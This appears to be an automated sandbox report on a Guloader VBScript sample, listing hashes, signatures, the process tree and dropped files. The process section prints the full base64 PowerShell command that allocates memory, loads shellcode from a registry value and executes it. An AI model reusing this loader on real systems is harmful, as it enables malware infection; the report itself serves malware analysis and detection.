Analysis
-
max time kernel
87s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
29-12-2022 07:10
Static task
static1
Behavioral task
behavioral1
Sample
f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
Resource
win10v2004-20220812-en
General
-
Target
f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
-
Size
123KB
-
MD5
ca12931ef2bc25a747d2586e8e199f65
-
SHA1
799394f1f0cc8b19c38f4ad6272d9b732f51e60e
-
SHA256
f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f
-
SHA512
daf8d9da424972116152f15710310b1b26fdbdb29e8f7514982bf2d5585fc856771742d525eced4422a8667eddbd9f360b066610b6e753045f53c8380b604134
-
SSDEEP
1536:FKQ1kslYluZNA03kyNYzF9AtbSF/DwJQAXR8GYpX5JcogiVvKaj7/yuJNUoBqZTr:FER0gAg9FsewJEk3dP6e8A
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 576 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.execsc.exedescription pid process target process PID 1096 wrote to memory of 576 1096 WScript.exe powershell.exe PID 1096 wrote to memory of 576 1096 WScript.exe powershell.exe PID 1096 wrote to memory of 576 1096 WScript.exe powershell.exe PID 1096 wrote to memory of 576 1096 WScript.exe powershell.exe PID 576 wrote to memory of 1688 576 powershell.exe csc.exe PID 576 wrote to memory of 1688 576 powershell.exe csc.exe PID 576 wrote to memory of 1688 576 powershell.exe csc.exe PID 576 wrote to memory of 1688 576 powershell.exe csc.exe PID 1688 wrote to memory of 1220 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 1220 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 1220 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 1220 1688 csc.exe cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAE4AUwBUAEkARgAgAFQAYQBwAHAAZQByAHMAbQA3ACAAdQBkAG0AYQB0AG4AaQBuAGcAZQAgAEQAZQBiAGwAbwBjACAATQBhAGwAYQB5AHMAaQBhAG4AMwAgAEYAbwByAG0AZQBsAGYAZQBsADgAIABoAG8AYgBsAGkAawBlAGYAcgBlACAARgBPAEwASwAgAHQAZQByAGsAYQBmAGwAIABLAEEATgBVACAAQQBDAEkARABJACAAUwBwAGUAYwA2ACAAUABlAHAAdABvAGcAIABQAHIAZQBkAGUAYwBlAHAAIABLAHkAYQBuAGkAegBpAG4AZwBhACAAUgBpAGMAaABmAGkAIABGAEkATABFAEIATgBLAEUAIAB0AHIAaQBwAGwAIABTAG8AbABiAHIAbgBkAHQAMwAgAGQAZQBwAHUAcgBhAHQAIABQAHIAYQB5AGYAdQAgAEYAcgB1AHQAaQBjAGUAdAAgAFUARABFAEwAQQBEAEQATwAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEMAYQByAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAGkAbgBkAGUAaAA1ACwAaQBuAHQAIABpAG4AZABlAGgANgAsAGkAbgB0ACAAaQBuAGQAZQBoADcALABpAG4AdAAgAGkAbgBkAGUAaAA4ACwAaQBuAHQAIABpAG4AZABlAGgAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABTAGwAZQBlAHAAKAB1AGkAbgB0ACAAQwBhAHIAYQAwACwAaQBuAHQAIABDAGEAcgBhADEALABpAG4AdAAgAEMAYQByAGEAMgAsAGkAbgB0ACAAQwBhAHIAYQAzACwAaQBuAHQAIABDAGEAcgBhADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB2AG8AaQBkACAAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAaQBuAGQAZQBoADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGkAbgBkAGUAaAAyACwAaQBuAHQAIABpAG4AZABlAGgAMwApADsACQANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAWgB3AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAWgBvAHAAcABvACgAaQBuAHQAIABDAGEAcgBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAbwB6AHkAdgBhAHAALABpAG4AdAAgAGkAbgBkAGUAaAAsAHIAZQBmACAASQBuAHQAMwAyACAAQwBhAHIAYQAsAGkAbgB0ACAAQgBBAEwATABFAFQATQAsAGkAbgB0ACAAQwBhAHIAYQA3ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBKAGUAcgByAHkAIABhAHUAdABvAGMAIABlAGoAbABhAHMAIAB5AGUAYwBoAHkAbAAgAEEAZgBmAGkAbAAgAHYAbwBnAHQAIABBAHMAcABlAHIAIABGAG8AcgBwAGEAZwB0ADQAIABCAHIAbgBlAGgAbwB2AGUAZAAgACAADQAKACQAQwBhAHIAYQAzAD0AMAA7AA0ACgAkAEMAYQByAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABDAGEAcgBhADgAPQBbAEMAYQByAGEAMQBdADoAOgBaAG8AcABwAG8AKAAtADEALABbAHIAZQBmAF0AJABDAGEAcgBhADMALAAwACwAWwByAGUAZgBdACQAQwBhAHIAYQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAQQB1AHQAbwB0AHkAcABlAHMAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFQAWQBNAFAAQQBOAEkARQBTAEkAIgApAC4ATABlAGsAdAANAAoADQAKACQAQgBpAGwAdABpAGwAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAQQB1AHQAbwB0AHkAcABlAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAEEAdQB0AG8AdAB5AHAAZQBzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEIAaQBsAHQAaQBsADIAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABBAHUAdABvAHQAeQBwAGUAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEgAVQBNAEIATwA9ADAAOwAgACQASABVAE0AQgBPACAALQBsAHQAIAAkAEIAaQBsAHQAaQBsADIALgBjAG8AdQBuAHQAIAA7ACAAJABIAFUATQBCAE8AKwArACkADQAKAHsADQAKAAkADQAKAFsAQwBhAHIAYQAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEMAYQByAGEAMwArACQASABVAE0AQgBPACwAWwByAGUAZgBdACQAQgBpAGwAdABpAGwAMgBbACQASABVAE0AQgBPAF0ALAAxACkADQAKAA0ACgB9AA0ACgBbAEMAYQByAGEAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAQwBhAHIAYQAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgANAAoA"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1142.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1141.tmp"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES1142.tmpFilesize
1KB
MD55b8f19e3314564c9cb2c8bf8d80d7807
SHA17829665e521f70f4bf11f473fd46628d4ca98312
SHA2562912e1327ff4eb1c80fae260f7d79e641d43be6048ece835e8fbf239bbc889cd
SHA512c91e84c2264244e03117c428f2ddfdbd3050fb9bbaac742b49e75f5f25bc7d6f3246e8fc1a0897f08485bf27829bbd881df466d4de94984fa6bdb229c2255ccc
-
C:\Users\Admin\AppData\Local\Temp\vsqyepgx.dllFilesize
3KB
MD5c2dec39245abbb8614be55a2c7920b1e
SHA128deb76ffb6517b39345dd7e202939e57ff53983
SHA25680de4069a261fab0b932cb0e308fb02848b66d7ad1f06b07a1150328cfbb8ede
SHA5126262ee5befb9745fe2f87cee6506bb813a8b8ea693468ca92f6c9b333428f30da1622f64c9b0e7b398c3ffd77ca93f45df35c63072bfcb1371c2f646e72bbc0e
-
C:\Users\Admin\AppData\Local\Temp\vsqyepgx.pdbFilesize
7KB
MD52f1126f1e2c110eb7067b9831c91f0f7
SHA17306b78101247b1c88e6fa58cbee830971eea44c
SHA256f0f0ee93a0e61c53ef971d51cbd13b0cd42358e3d5ad8b31687bced7cbb5ddaf
SHA512c6d4f6fa281a26e31f356ad6ba0c9488086b912db54e9be591d8bf712455fdcb98f03d2d12f60fa7b601599b1895ca10091e88c0347a7119a39c59d8900b15a7
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC1141.tmpFilesize
652B
MD569ee8eaa272fd987c3f81548f772d7f9
SHA1e9ca9513c71fd974c7ac41400cbe06cf628c43e8
SHA2562fb030c9508e6457f8725a42317b8b553a357b1abbb9981dd3f9fe3169e8e7d6
SHA5124fcb435c03c42cbe549b0636cd9323688c74aea4e8d2f3a556737bd726fad964a882b862579197dc815cdabd7798318d7350bfeb6a32447dbec31e63a0dbb1af
-
\??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.0.csFilesize
615B
MD51b2f119b151022bb977fb9d85ae015c7
SHA12be4ce4b0a74fad4c260fc9a56d163bcee6d5587
SHA2562c64726434fdab138a011da7c7e6433aaca47fc0a706a36cd0ea459a5f58c7dd
SHA512ba78074ee8673b7a5318654afc5c94b5c0daef3999e627286e65447a0c16591af03d5dd06284fbb5d72d29e04c3d35403a34f0db333d555c4456c00930df5a42
-
\??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdlineFilesize
309B
MD59910527cdbc6a0cceac59e5ff6d62d30
SHA18b2a45227a897fc47423e33b8c5f3438b15bfb29
SHA256529afecb5b0570787dc85ea6d2157d4c67bcf395045281f0c2bd6706de8c9ce6
SHA512d9fc3a9814ed3795142a328d7a2052c1d6f8f203f798aeb6660df9513d65743b61ac16d78ffd06d5152ba9c33b5a093184fc0f6fcacf679353fda4be982d0ec4
-
memory/576-57-0x0000000074620000-0x0000000074BCB000-memory.dmpFilesize
5.7MB
-
memory/576-56-0x00000000767D1000-0x00000000767D3000-memory.dmpFilesize
8KB
-
memory/576-55-0x0000000000000000-mapping.dmp
-
memory/576-66-0x0000000004FE0000-0x00000000050E0000-memory.dmpFilesize
1024KB
-
memory/576-67-0x0000000074620000-0x0000000074BCB000-memory.dmpFilesize
5.7MB
-
memory/1096-54-0x000007FEFC421000-0x000007FEFC423000-memory.dmpFilesize
8KB
-
memory/1220-61-0x0000000000000000-mapping.dmp
-
memory/1688-58-0x0000000000000000-mapping.dmp